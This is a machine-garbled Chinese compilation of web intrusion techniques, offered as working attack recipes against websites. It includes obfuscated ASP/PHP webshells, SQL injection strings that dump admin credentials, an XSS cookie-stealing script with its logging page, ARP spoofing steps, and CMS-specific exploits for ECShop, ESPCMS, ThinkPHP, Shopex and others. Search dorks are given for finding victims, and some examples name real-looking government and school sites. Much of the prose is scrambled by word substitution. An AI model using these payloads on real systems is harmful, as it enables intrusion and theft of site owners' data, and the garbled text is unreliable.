( 假如上传成功后不曾将木马剖判成asp,能够尝尝将文件名改成asa、cer、php 再特别就用IIS 6.0深入分析漏洞,将文件名改为1.asa;1.jpg )

=============================================================================================================================================================

【 抓包nc上传获取管理权限 】

其一措施约等于cookie欺诈,首先到前台去登记二个会员,注册成功后在登录的那一刻,用抓包工具实行抓包,把抓到的数量复制到1.txt里面。

接下去展开,把双引号里棉的数量“X-Forwarded-For: 127.0.0.2′,group_id = 1 where loginname = ‘会员的帐号’#” 放在Content-Length:的下面。

在收看最上边包车型地铁loginname=这行代码,把最终边的验证码改成当下会员登入的验证码,然后将nc1.txt 坐落同一个索引下,cmd命令:nc 域名 80<1.txt

职业有成交付上去后,刚才的会员帐户将改为管理员帐户了,找到该站的后台地址登陆就可以兑现cookie欺诈!

=============================================================================================================================================================

【 cookie欺骗 】

当大家由此注入恐怕社工把管理员的帐号跟md5密码搞到手的时候,却开掘破解不出密码 (MD5是15人加密的)

那便是说大家就足以用首席营业官KIE期骗来绕过,利用秦皇岛红军的cookie棍骗工具,把自个儿的ID以至md5密码都修改成管理员的,再修改cookie,访谈时就能够促成期骗了。

=============================================================================================================================================================

【 cookie中间转播突破防注入 】

一时检验二个网站,系统会弹出一些SQL防注入的提示框,那时大家得以应用CEOKIE中间转播注入来扩充突破,首先希图三个webshell,然后展开高管KIE中间转播工具。

复制注入点到“注入U福特ExplorerL地址跟来源页”处,把问号去掉,再把问号前边的ID=剪切到“注入键名”里,再把ID=前面那些参数剪切到“POST提交值”里替换jmdcw=前边的参数。

点击生成,再把调换的文本上传到webshell里,然后访谈路线,再页面地址前面加“?jmdcw=参数”,那样搭创建造出来的注入点就绕过防注入了!

如上是在webshell里搭建ASP坏境的法门,上边包车型大巴是当地架设ASP意况的措施:

应用简易IIS服务器搭建贰个条件,再将CEOKIE中转生成的文件放到简易IIS服务器的目录下!然后运营简易IIS服务器,在后头+文件名+问号+jmdcw=参数就能够。

=============================================================================================================================================================

【 cookie手工突破防注入 】

先是种方法:

用 and 1=1 and 1=2 检查测量试验网址是或不是留存注入点时,倘若提醒您的IP已被记录,就申明系统做了防注入措施,能够用代码来突破。

社团者只过滤了and,不过从未过滤or,大家能够先猜网址的字段数 格式:order by 数字  猜到错截至,然后选前八个对的数字!

诸如猜到14谬误,那就是13了,然后采纳Cookie提交变量值,代码:javascript:alert(document.cookie=id=”+escape(“这里填写变量值,比方:id=408″));

始于猜消肿段,代码:javascript:alert(document.cookie=”id=”+escape(“变量值 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from admin”));

复制在浏览器里张开,将出现四个提示框,点击明确就能注射进去,再重新展开网址(要在这里边展开,所在此以前边最佳复制下网址地址)

下一场就能够现出七个提示数字,比方5跟6,然后在代码的5跟6处猜帐号密码,常见的帐号有:user  username  密码:pass  password

复制修改后的代码放到浏览器里展开,就能爆破出网址的帐号密码了。

 

第三种艺术:

注入点:http://www.XXXXXXXX.gov.cn/shownews.asp?id=4098

先是把?id=408去掉,然后访谈假若提醒“数据库出错”!就证实网址并未有过滤Cookie提交形式,能够选拔库克ie诈欺绕过防注入!

运用Cookie提交变量值,代码:javascript:alert(document.cookie=”id=”+escape(“4098″)

上边初始在Cookie注入中实行例行注入攻击,提交代码:javascript:alert(document.cookie=”id=”+escape(“4098 and 1=1″));

访问http://www.XXXXXXXX.gov.cn/shownews.asp 呈现符合规律页面,

再付出代码:javascript:alert(document.cookie=”id=”+escape(“4098 and 1=2″));  显示错误页面!

上边来初叶猜止血段,提交代码:javascript:alert(document.cookie=”id=”+escape(“4098 and exists (select * from 表段)”));

继而猜字段,提交代码:javascript:alert(document.cookie=”id=”+escape(“4098 and exists (select 字段 from admin)”));  例如:username

继而猜字段,提交代码:javascript:alert(document.cookie=”id=”+escape(“4098 and exists (select 字段 from admin)”)),   举个例子:password

上边初叶猜字段数跟字段内容了,提交代码:javascript:alert(document.cookie=”id=”+escape(“4098 and 1=2 union select 1,2,3,4,5,6 from 表段”));

向来猜解到对停止,这里只是猜到6,记得继续加减!猜解到对的时候,页面会现身数字,然后在相呼应的数字替换字段名,再扩充付出代码!

此刻要是字段名猜对的话,就能够揭示帐号密码了,不对的话继续替换字段名,位置不改变!(存在cookie注入时提出参照他事他说加以考察mysql手工业注入的说话)

=============================================================================================================================================================

【 伪静态注入 】

伪静态网址注入方法,莱鸟扫除文盲来了啊,平日情形下,动态脚本的网站的url类似上边那样:

做了伪静态之后就成那样了:

以斜杠“/”替代了“=”并在终极加上.html,那样一来,就无法直接用工具来注入了。

例行的伪静态页面如下:http://www.XXX.com/play/Diablo.html

比方关联的动态页面是game.php ,那么当客商访问后先后会自动调换到类似http://www.XXX.com/game.php?action=play&name=Diablo的形式

注入点检查测量试验能够用:http://www.XXX.com/play/Diablo‘ and 1=’1.html与http://www.XXX.com/play/Diablo‘ and 1=’2.html来判断

万般景况下,动态脚本的网址的url类似上边那样:

做了伪静态之后类似那样: 以斜杠“/”庖代了“=”并在终极加上.html,那样一来,就不可能直接用工具来注入了!

=============================================================================================================================================================

【 嗅探 】

当凌犯多个网址,该网站并未有其余破绽的图景下,能够开展旁注,再提权拿下大肆一台服务器,不行的话就C段,提权拿下大肆一台服务器。

一经能砍下同网段的自由一台服务器,就足以应用C段嗅探来取得主站的帐号密码,cain是一款强盛的绑架工具。

在服务器里安装cain后打开主要调控端,点击配置->选取服务器IP一项->在路由追踪一项撤废一切->明显。

安装达成后点击一下振憾按键(中间那多少个),再点击嗅探器,点击加号符号,选择具有在子网主机,选用ARP测量试验(传播 31-位),显明。

举目四望完成选用网关一项,点击ARP,点击加号符号,左侧选拔网关,左侧选取任何的C段,明确,点击开首嗅探开关(第多个),嗅探到的帐号密码在口令一项表现!

假定开掘相当少年足球以选拔幻境网盾来界定网速,让cain的发包快过防火墙。

=============================================================================================================================================================

【 arp欺骗 】

只要该服务器存在C段,都能够品味arp诈骗,用到的工具是NetFuke,想清楚arp威逼能还是不可能不负任务,cmd命令:arp -a  看一下,动态的服务器IP就会成功,静态的就不可能。

安装完运转主要调节端,设置–嗅探设置–网卡选拔服务器的IP–调节选项选拔“启用ARP欺诈、启用过滤器、启用深入分析器、启用修改器、主动转发” 分明。

安装–ARP欺诈–双向诈欺–来源Ip填服务器的网关–中间人IP填服务器的IP–目的IP填要欺诈的大肆C段ip(用御剑扫描C段)–分明。

插件处理–修改器–最终四个采撷双击–在左侧的HTML Body = [haha!!] 填写本身要显示的文字,点击开头就可以棍骗成功!

=============================================================================================================================================================

【 突破安全狗防注入及上传 】

写入webshell 写不步入,常常的一句话 也失效,用这段代码:

<%@ Page Language=”C#” ValidateRequest=”false” %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>

三回九转端用cncert的aspx一句话客商端

2、IIS6.0分析漏洞境遇安全狗

文本名字为;1.jpg

那般的会被IIS安全狗决断屏蔽

改成如下名称,IIS6同样会解析:

www.baicai.com/;1.asp;1.jpg

3、安全狗的流入绕过

常用的如baicai.asp?id=1 and 1=1 是会被安全狗屏蔽的。
但这么就足以突破了:

baicai.asp?0day5.com=%00.&id=69%20 and 1=1

=============================================================================================================================================================

【 跨站xss 】

在网址留言恐怕能输入信息的地点付出跨站代码,进而盗走管理员cookie,然后用cookie浏览器直接踏向后台,将以下代码保存为asp文件,举例1.asp

 

<%
thisfile=Server.MapPath(“cookie.txt”)
msg=Request(“msg”)
set fs=server.CreateObject(“scripting.filesystemobject”)
set thisfile=fs.OpenTextFile(thisfile,8,True,0)
thisfile.WriteLine(“=======cookie:”&msg&”======by:剑眉英雄”)
thisfile.close
set fs=nothing
%>

第一搭建贰个asp情况,推荐应用“ASP服务器(摆脱安装IIS)” 再将1.asp放在wwwroot目录下,访谈1.asp文件假诺指示下载,则印证搭建造成功了。

然后在留言板的“您的网站”一处输入:<script>doucument.location=’‘document.cookie</script>

当管理员浏览我们付出的留言时,就要wwwroot目录下生成三个cookie.txt文件,那时大家只要访谈cookie.txt这些文件,就能够明白管理员的cookie是有一些了!

下一场再使用九江老兵的cookie欺骗工具或是网页源代码查看剖判器,访问网址再输入cookie进行诈骗登陆就可以!(填cookei的时候记得选取自定义)

小能力:要想让管理员早点浏览你付出的留言,能够透过打电话,QQ客服等去社会群工他就能够。

=============================================================================================================================================================

【 爆库 】

%5C为十六进制的标识,而数据库大于5.0就能够爆库,若二个网址数据库大于5.0,且是ACESS数据库,若无法注入的注入点是:

大家平昔把%5C加到rpc后面,因为%5C是爆二级目录,所以理应是如此,

而%23是代表#,尽管管理员为了防止万一外人违规下载数据库,而把数据库改成#database.mdb,那样防备了。

万一页面地址为:http://www.xx.com/rpd/#database.mdb ; 把%23替换#就足以下载了,即:

再有使用暗中认可的数据库路径  后边加上 conn.asp 若无改造暗中认可的数据库路线,也得以拿走数据库的门路(注意:这里的/也要换到%5c)

尽管您能见到:’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是二个灵光的不二等秘书技。 分明路线名称拼写是还是不是准确,以至是还是不是连接到文件存放的服务器。

这么的正是数据库了。下载时用FLASHGET换来.MDB格式的就行.

=============================================================================================================================================================

【 利用sql注入点决断网址和数据库是不是站库分离 】

在注入点后拉长:and exists(select * from admin where 1=(Select (case when host_name()=@@servername then 1 else 0 end)))

瞩目admin必需要是存在的表段,倘若回去寻常,表明网址和数据库是在一样服务器,假如不健康则表明是站库分离的。

=============================================================================================================================================================

【 iis6.0 PUT写入漏洞 】

行使工具:IIS PUT Scaner、大庆老兵IIS写权限制行驶使程序

1、IIS张掖顾客对网址文件夹有写入权限
2、web服务器扩充力设置webDAV为允许,即:WebDAV—打勾
3、网址主目录:写入—打勾(可PUT)
4、网址主目录:脚本财富访谈—打勾(可COPY、MOVE)

世家都精通,写权限便是同意PUT,与网址自己运营的权能无丝毫挂钩,假设翻开了,就是从未一点安全意识,就给大家提供了大大的方便。

率先用御剑工具扫下C段,比方:12.12.12.1 – 12.12.12.255  打开IIS PUT Scaner,把12.12.12.1身处Start IP 这里,12.12.12.255放在End IP 这里,

继而在Port这里,换来80,点击Scan初叶嗅探,当PUT这里展现是Yes就证实存在破绽,能够右键选取PUT file,输入文件名1.txt,上边填内容,保存就能够写入了。

大概利用“德阳老兵IIS写权限行使程序”也足以,那款工具相比较强硬,把域名填写进去,譬喻:www.xxx.com,然后在呼吁文件这里输入你的文件名,

在数量包格式这里采用PUT,有的会直接弹出浏览文件框,未有就融洽选取,在上面,然后点击提交数据库就能够,经常是先PUT三个txt文件,再MOVE成asp木马。

直接提交asp木马的话,借使MOVE方法丰盛,能够推行Copy。

=============================================================================================================================================================

【 ACCESS推行SQL语句导出一句话拿webshell 】

规律大概和php网址的outfile大约,在access后台其余方法无法获得webshell,可是后台有SQL语句询问实施,就能够直接access导出一句话拿webshell了。

 

可是须要理解物理路线本事导出,利用IIS的拆解分析漏洞导出EXCEL文件得到webshell,因为ACCESS数据库不允许导出其余危殆格式,我们导出为EXCEL后在行使IIS剖析漏洞就足以改为大家的木马了。

点“服务器音讯探测”,获得网址路线:e:webwebshellcc的EXCEL 点“系统管理”-》“自定义施行SQL”,试一下,能够实行的话能够用access导一句话拿下shell。

create table cmd (a varchar(50))  创建四个有贰个A字段的表 表名称为cmd 字段类型为字符 长度为50

insert into cmd (a) values (‘<%execute request(chr(35))%>’)  在表cmd的a字段插入密码为#的一句话木马

select * into [a] in ‘e:webwebshellcc1.asa;x.xls’ ‘excel 4.0;’ from cmd  把cmd表a的原委导出到路线e:webwebshellcc的EXCEL文件

drop table cmd  删除创建的cmd表

菜刀连接:;x.xls

=============================================================================================================================================================

【 利用过滤’or’='or’修改代码举办绕过 】

举个例子说后台地址是:

当用万能密码登入的时候,会并发局地过滤or的升迁!

请右键查看源文件,另存为桌面 XX.html,然后展开找到以下这段代码,举办删减!

<script language=”javascript”>
function chencklogin()
{
if(document.login.username.value==”)
{alert(‘请输入客户名’);
document.login.username.focus();
return false
}
if (document.login.password.value==”)
{alert(‘请输入密码’);
document.login.password.focus();
return false
}
}
</script>

潜心:将以下段代码中的 “index.asp?action=chkadmin” 修改为 ““

<form action=”index.asp?action=chkadmin” name=”login” method=”past” onsubmit=return checklogin();”>

聊到底保存展开,再用’or’='or’登入时,系统已不再过滤,结果就能够用万能密码登入进去了!

=============================================================================================================================================================

【 动力3.5拿shell 】

inurl:printpage.asp?ArticleID=

1.找到版权音信,把内容替换到:

版权全数 Copyright? 二零零四 <a href=’http://www.asp163.net‘>引力空间</a>” ‘版权信息

if Request(“xiaoxin”)=”520″ then
dim allen,creat,text,thisline,path
if Request(“creat”)=”yes” then
Set fs = CreateObject(“Scripting.FileSystemObject”)
Set outfile=fs.CreateTextFile(server.mappath(Request(“path”)))
outfile.WriteLine Request(“text”)
Response.write “小新恭喜”
end if
Response.write “<form method=’POST’action=’”&Request.ServerVariables(“URL”)&”?xiaoxin=520&creat=yes’>”
Response.write “<textarea name=’text’>”&thisline&”</textarea><br>”
Response.write “<input type=’text’ name=’path’ value=’”&Request(“path”)&”‘>”
Response.write “<input name=’submit’ type=’submit’ value=’ok’ ></form>”
Response.end
end if
%>

2.然后保存,千万别跳转其余页面,直接在IE地址栏内将 admin/Admin_Login.asp 替换成 inc/config.asp?xiaoxin=520

3.得逞后会走入五个像小马一样的页面,粘贴木马代码以致写上木马文件名就可以获得wshell,木马在inc目录。

=============================================================================================================================================================

【 动易cms拿shell 】

点击网址配置,在网址名称前面插入一句话木马,连接inc/config.asp

=============================================================================================================================================================

【 aspcms】

简单易行描述:后台文件AspCms_About艾德it.asp 未开展求证,且未过滤,导致SQL注入。

爆帐号密码:
admin/_content/_About/AspCms_AboutEdit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1

本子不相同必要改造值。

第三种办法,找到后台,然后/admin/_system/AspCms_SiteSetting.asp?action=saves

直接POST
[php]runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0

 

&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&

waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn

&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1

&LanguageID=1[/php]

再连接配置文件config.asp 密码为#

老版本中得以因而丰裕模板间接增加asp.可是新版已经限制了增进模板的格式为html,js,css

当然要是是遇上iis6的话照旧得以经过iis6的分析漏洞把文件名改成1.asp;.html那样的格式来获得shell的.

主意:点击“分界面风格”,然后选“编辑模板/CSS文件”,然后“增加模板”,文件名称写error.asp;.html,文件内容写一句话<%eval request(“g”)%>

下一场加上,会唤起增加成功,然后在模板列表中就足以找到大家添加的一句话了,用菜刀连接就可以!

可是借使超越iis7.5呢? 以下是本人本身找到开采到的aspcms通杀版本的后台拿shell方法.

1、步入后台,“扩充功用”–“幻灯片设置”–”幻灯样式”

2、使用chorme的稽审成分成效依然firefox的firebug,同理可得使用能修改当前页面元素的工具就好了,将相应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%

3、一句话木马,密码a。在/config/AspCms_Config.asp

 

=============================================================================================================================================================

【 XYCMS集团建站系统 】

关键词:inurl:showkbxx.asp?id=

暗中认可数据库:data/xy#!123.mdb

暗中认可账户密码:admin admin

找到网址配置,在网址名称里面直接插入一句话:网站”%><%eval request(“x”)%><%’,注意不要删掉网址名称!然后中夏族民共和国菜刀连接:/inc/config.asp

也许找到网址地址,在

=============================================================================================================================================================

【 szwyadmin漏洞绕过后台验证 】

关键字:inurl:szwyadmin/login.asp

javascript:alert(document.cookie=”adminuser=”+escape(“‘or’='or’”));javascript:alert(document.cookie=”adminpass=”+escape(“‘or’='or’”));javascript:alert(document.cookie=”admindj=”+escape(“1″));

1.后台平日设有二个szwyadmin文件夹,复制一下后台地址位于一边,之后复制代码替换后台地址访谈实行注射!

2.那时候会弹出叁个窗口,一连点击二遍显明。

3.再度访谈后台地址,把网址背后的/login.asp 换来 admin_index.asp 神蹟般的直接步入后台了!

=============================================================================================================================================================

【 医院建站系统随机文件上传漏洞 】

关键词:inurl:cms/Column.aspx?
关键词:inurl:cms/Column.aspx?LMID=

漏洞使用 :xtwh/upfile.aspx

间接上传aspx木马拿shell。

=============================================================================================================================================================

【 Struts 2远程执行命令漏洞 】

struts 2一种java-web的MVC框架技巧,和价值观的struts1有一点都不小的查对。

严酷来讲,那实际上是XWork的尾巴,因为Struts 2的骨干使用的是WebWork,而WebWork又是采纳XWork来管理action的。

关键词:inurl:common/common_info.action?wid=

 常常页面以.action结尾的几乎都留存那么些漏洞,能够用工具检验一下就清楚了。

本条漏洞是在Java运维情形下使用的,Java运营条件下载地址:

=============================================================================================================================================================

【 嘉友科技(science and technology)cms上传漏洞 】

谷歌(Google)主要字:inurl:newslist.asp?NodeCode=

次第采用的上传页uploadfile.asp未开展管制验证,导致创设畸形目录上传图片木马获取shell漏洞。

exp:ploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

 

她原上传目录是:uploadfile.asp?uppath=PicPath&upname=&uptext=form1.Pic帕特h

何况他的上传文件未有过滤导致未授权访问,直接上传小马,然后小马前边写为1.jpg  访谈路线 查看源代码。

=============================================================================================================================================================

【 ecshopcms后台拿shell 】

支撑最新2.7.2本子,通杀最新版本后台低权限!

<?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112); $filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62); $a=chr(119); $fp=@fopen($filen,$a); $msg=@fwrite($fp,$filec); if($msg) echo chr(79).chr(75).chr(33); @fclose($fp); ?>

后台-订单管理-订单打字与印刷-选择源代码编辑-保存-重回订单列表,随便选择一个订单打字与印刷,再次回到OK,生成一句话成功-在根目录生成了一个null.php,一句话密码:usb

=============================================================================================================================================================

【 phpcms二〇一〇版本 直接实施php代码漏洞 】

关键字:inurl:yp/product.php

exp代码:pagesize=${${@eval_r($_POST[cmd])}}

测量试验网址:

动用方式:http://www.slsdgc.com.cn/yp/product.php?pagesize=${${@eval_r($_POST[cmd])}}

菜刀连接:http://www.slsdgc.com.cn/yp/product.php?pagesize=${${@eval_r($_POST[cmd])}}  密码cmd

菜刀连接注意以下格式:

   私下认可等第                    php                       gb2312

=============================================================================================================================================================

【 教育站sql注入通杀0day 】

关键词:inurl:info_Print.asp?ArticleID=

暗中同意后台:website/ad_login.asp

比如:http://www.psfshl.pudong-edu.sh.asp?ArticleID=1650

加上:union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin

与此相类似就径直获得了协会者账户和经过Md5加密的密码了。

=============================================================================================================================================================

【 IIS7.0 畸形深入分析漏洞通杀oday 】

找到某些使用IIS7.0架设的站,然后找到在那之中的图形上传点(无需管理权限,普通注册顾客就可以解决),把PHP一句话图片木马缀改成.jpg,传上去,获得图片地址。

在图片格式后边增加xx.php xx随意你怎么填,只要后缀为.php就好,之后菜刀连接就可以!

=============================================================================================================================================================

【 Yothcms 遍历目录漏洞 】

优斯科学和技术公司网址管理系列(YothCMS)是一款完全开源无需付费的CMS。

暗中认可后台:admin/login.asp

遍历目录:ewebeditor/manage/upload.asp?id=1&dir=../

数据库路线:%23da%23ta%23%23db_%23data%23%23.asa

=============================================================================================================================================================

【 传信网络独立开采网址源码0day漏洞 】

私下认可后台:system/login.asp

编辑器后台路线:ubbcode/admin_login.asp

数据库路线:ubbcode/db/ewebeditor.mdb

暗许账号密码:yzm   111111

=============================================================================================================================================================

【 科讯cms 6.5后台拿shell 】

1.足以在数据库备份中找到网址的相对路线

2.施用科讯SQL注入漏洞使用工具也能找到

 

进去后台后推行sql命令:
create table E:wenxiushiwz001\KS_DataCollectKS_Collect.Mdb.cmd  (a varchar(50))
insert into E:wenxiushiwz001KS_DataCollectKS_Collect.Mdb.cmd  (a) values (‘┼攠數畣整爠煥敵瑳∨∣┩愾’)

继而数据库备份成1.asp  菜刀连接密码:#

=============================================================================================================================================================

【 动易2006后台拿shell 】

进去后台后,我们在左侧菜单栏中选取“系统设置”,然后在产出的菜单栏里挑选“自定义页面管理”,

跟着须要先加多二个自定义页面分类,选用“增加自定义分类”那个选项,分类名称与分类简要介绍都得以随意填写。填写完结后采用“增添”,系统提醒加多成功。

上边再来选用“增添自定义页面”,“页面名称”随意输入,“所属分类”正是刚刚建立的归类就足以了。“页面类型”和“页面路线”都毫不管,保持暗中同意.

而是只要未有改页面路线的话,私下认可生成的文件是在根目录下的,相当于“文件名称”即输入生成的木马的文件名。

“页面简要介绍”也不用管,下边正是页面内容了。这里填入小马的代码。一切实现点击“增添”会提醒保存自定义页面成功。最终一步是要生成大家的木马页面。

分选“自定义页面管理首页”,点击侧面出现的“生开销页”就OK 了,成功赢得动易的shell。

=============================================================================================================================================================

【 Shopex4.8.5 注入漏洞后台拿shell 】

关键词:powered by shopex v4.8.5

exp:

<html>

<head>

<title>Shopex 4.8.5 SQL Injection Exp</title>

</head>

<body>

<h2>Shopex 4.8.5 SQL Injection Exp (product-gnotify)</h2>

<form action=”” method=”post” name=”submit_url”>

        <input type=”hidden” name=”goods[goods_id]” value=”3″>

        <input type=”hidden” name=”goods[product_id]” value=”1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators”>

        <input type=”submit” value=”">

</form>

fuck

<body>

</html>

保留为html格式,替换代码中的网址,当地张开后点击小Logo,现身新页面,帐号密码爆出来了,私下认可后台:shopadmin

拿shell方法….

先是步 页面管理 修改模版 然后选八个XML编辑

发端用 live http 抓包 你们懂的 然后把第贰个POST包给抓出来

接下来改包 id=1273923028-info.xml&tmpid=1273923028&name=index_temp.php&file_source=

解释一下 id是你挑选的模版文件夹名称 前边的info.xml 是您改改的XML文件 tmpid= 你们懂的 正是模版文件夹 然后 name 是您付出的文书名字 file_source 是后门或许shel

自己这里是一句话 你们懂的 然后交由了后头 地址是那样的http://Madman.in/themes/文件名称/你的木马名称

=============================================================================================================================================================

【 ecshop漏洞总汇 】

关键字:powered by ecshop

 

平常性代码:user.php?act=order_query&order_sn=’ union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*

变种代码:search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2CRUISERzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

直接在网址后台出席代码回车就能够暴光帐号密码,再去掉代码加上/admin回车就会一向进后台了。

 

拿shell方法相当的粗略,找到“库项目管理”再采纳“配送的格局”,在代码最上边插入php一句话木马:<?php eval($_POST[x]);?> 不行就换php木马的预代码!

紧接着保存,一句话路线是:; 打开“ASP+PHP两用Shell.html”填入地址,点击一下意况变量,成功之后点击上传文件就足以拿shell了。

=============================================================================================================================================================

【 ESPCMS通杀0day 】

关键字:inurl:index.php?ac=article&at=read&did=

默许后台:adminsoft/index.php 或许 admin/

注入点(爆表前缀,举个例子:cm_admin……前缀正是cm,前边3个代码要活动替换):

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,table_name,0×27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆客商名:

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆密码:

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,password,0×27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

密码和顾客一次性爆:

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,password)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

拿shell:

进到后台后,直接点击分类图片===修改==接纳文件===直接上传一句话木马

PS:
当上传不了php网午时,去系统设置一下,增添图片上传格式 |php 那样就能够上传二个图片文件头的网马。

=============================================================================================================================================================

【 帝国cms 6.6最新版本 】

自定义页面-扩充自定义页面-随意写个.php文件名,内容写:<script language=”php”>echo base64_decode(“PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=”);</script>

借使剧情一贯添一句话或然php马来亚是行不通的,因为他会生成xxx.php前先给您试行,

PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=  就是 <?php @eval($_POST['cmd']);?> 的base64加密。

故此生成xxx.php后 会油然则生内容 <?php @eval($_POST['cmd']);?> 在文件里,然后用菜刀直接连接吧。

=============================================================================================================================================================

【 phpweb 】

关键字:inurl:down/class/index.php?myord=

后台地址:admin.php

万能密码:admin ‘or ’1′=’1

流入地址:down/class/index.php?myord=1

表段:pwn_base_admin

拿shell通杀漏洞:登陆后台–小说–小说公布–小说内容里的图样上传按钮–抓包之后改包NC提交。

也得以用上面包车型客车exp拿shell:

用火狐浏览器登入后台,因为火狐浏览器有保留cookies的效果, 找到“phpweb之exp”那几个html,拉进火狐浏览器器里上传1.php;.jpg的一句话木马,查看源码菜刀连接!

=============================================================================================================================================================

【 动科(dkcms)漏洞分析 】

官方网站:www.dkcms.com

 

重在是基本上3个版本为主吧,

V2.0   data/dkcm_ssdfhwejkfs.mdb

V3.1   _data/___dkcms_30_free.mdb

V4.2   _data/I^(()UU()H.mdb

暗中认可后台:admin

编辑器:admin/fckeditor

有鉴于此,官方安全意识挺差的,至于后台拿shell,fck编辑器突破可拿shell

建立asp文件夹

Fck的路径:Admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/mk.asp&NewFolderName=mk.asp

=============================================================================================================================================================

【 ESPCMS通杀0day 】

百度主要字:inurl:index.php?ac=article&at=read&did=

私下认可后台:adminsoft/index.php

注入点(爆表前缀):index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,table_name,0×27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆帐号:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆密码:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,password,0×27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

帐号和密码贰回性爆:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,password)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

进到后台后,直接点击分类图片-修改-选拔文件-直接上传php一句话木马

PS:当上传不了php木马时,去系统设置一下,增加图片上传格式 |php ,那样就能够上传三个图片文件头的php木马。

=============================================================================================================================================================

【 Thinkphp框架任性代码实践漏洞 】

ThinkPHP是一款我国应用比较分布的有名PHP MVC框架,官方已经昭示修复漏洞的补丁,地址:

主要字:thinkphp intitle:系统产生错误

获取Thinkphp的本子号:index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D

赢得服务器的配备音讯:index.php/module/aciton/param1/${@phpinfo()}

列出网站有着文件列表:index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al

直接在网页实践一句话:index.php/module/action/param1/{${eval($_POST[s])}}

菜刀连接:{${eval($_POST[s])}}   密码:s

=============================================================================================================================================================

【 良精系统 】

( 爆管理员帐号密码的代码 )

NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’

( 一句话木马的妙用 )

插入一句话木马后,连接网址的布局文件:inc/config.asp 密码都以g

1.网址配置-允许的上传文件类型-插入闭合的一句话木马:”%><%eval request(“g”)%><%s=”  不行就大增八个cer格式,之后上传cer格式的木马就能够

2.网址配置-网址地址-插入闭合的一句话木马:

3.网址配置-网址名称-插入闭合的一句话木马:洛阳临港彩越化学工业有限公司”%><%eval request(“g”)%><%s=”

4.网址配置-版权音讯-插入闭合的一句话木马:”%><%eval(request(chr(103)))%><%’

5.本形式适用于access数据库,只要在access数据库任何地方插入:┼攠數畣整爠煥敵瑳∨≡┩> 再将mdb备份成asp大概asa,访谈那几个asp或asa,正是一句话木马。

 

